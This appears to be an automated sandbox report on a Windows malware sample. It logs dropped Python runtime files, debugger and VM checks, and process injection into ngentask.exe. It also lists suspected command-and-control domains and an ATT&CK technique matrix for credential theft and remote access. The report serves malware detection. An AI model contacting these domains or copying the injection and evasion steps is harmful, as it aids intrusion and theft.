    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_overlapped.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_lzma.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_queue.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\pyexpat.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_ctypes.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\libssl-1_1.dllJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_bz2.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_asyncio.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_decimal.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_ssl.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_multiprocessing.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\select.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\unicodedata.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_hashlib.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_socket.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeAPI coverage: 7.2 %
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe TID: 5948Thread sleep time: -120000s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe TID: 6080Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F603E2 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,0_2_00F603E2
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F699B3 FindFirstFileExW,0_2_00F699B3
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 2_2_00F699B3 FindFirstFileExW,2_2_00F699B3
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 2_2_00F603E2 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,2_2_00F603E2
    Source: ngentask.exe, 00000003.00000002.1613322725.0000000001347000.00000004.00000020.00020000.00000000.sdmp, ngentask.exe, 00000003.00000002.1613155400.00000000012ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: ceFgl3jkkk.exe, 00000002.00000002.1547337183.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1544241363.0000000000DDC000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1517209000.0000000000DDC000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546386874.0000000000DDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00440600 LdrInitializeThunk,3_2_00440600
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F63987 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F63987
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F6A500 mov eax, dword ptr fs:[00000030h]0_2_00F6A500
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F627A5 mov eax, dword ptr fs:[00000030h]0_2_00F627A5
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 2_2_00F6A500 mov eax, dword ptr fs:[00000030h]2_2_00F6A500
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 2_2_00F627A5 mov eax, dword ptr fs:[00000030h]2_2_00F627A5
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F6AD03 GetProcessHeap,0_2_00F6AD03
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F5A075 SetUnhandledExceptionFilter,0_2_00F5A075
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F63987 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F63987
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F59986 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00F59986
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F59EE1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F59EE1
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 2_2_00F5A075 SetUnhandledExceptionFilter,2_2_00F5A075
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 2_2_00F63987 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00F63987
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 2_2_00F59986 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00F59986
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 2_2_00F59EE1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00F59EE1

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 protect: page execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 value starts with: 4D5AJump to behavior
    Source: ceFgl3jkkk.exe, 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: drawwyobstacw.sbs
    Source: ceFgl3jkkk.exe, 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: condifendteu.sbs
    Source: ceFgl3jkkk.exe, 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ehticsprocw.sbs
    Source: ceFgl3jkkk.exe, 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: vennurviot.sbs
    Source: ceFgl3jkkk.exe, 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: resinedyw.sbs
    Source: ceFgl3jkkk.exe, 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: enlargkiw.sbs
    Source: ceFgl3jkkk.exe, 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: allocatinow.sbs
    Source: ceFgl3jkkk.exe, 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: mathcucom.sbs
    Source: ceFgl3jkkk.exe, 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: droppyrelivei.cfd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000Jump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 401000Jump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 445000Jump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 448000Jump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 458000Jump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: EA6008Jump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeProcess created: C:\Users\user\Desktop\ceFgl3jkkk.exe "C:\Users\user\Desktop\ceFgl3jkkk.exe"Jump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exeJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F5A185 cpuid 0_2_00F5A185
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\_ctypes.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\_socket.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\select.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\_uuid.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI8242\_hashlib.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeQueries volume information: C:\Users\user\Desktop\ceFgl3jkkk.exe VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F59DD4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00F59DD4
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F6D933 _free,GetTimeZoneInformation,_free,0_2_00F6D933
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation
    1
    DLL Side-Loading
    311
    Process Injection
    1
    Virtualization/Sandbox Evasion
    OS Credential Dumping2
    System Time Discovery
    Remote Services1
    Screen Capture
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    311
    Process Injection
    LSASS Memory21
    Security Software Discovery
    Remote Desktop Protocol1
    Archive Collected Data
    1
    Ingress Tool Transfer
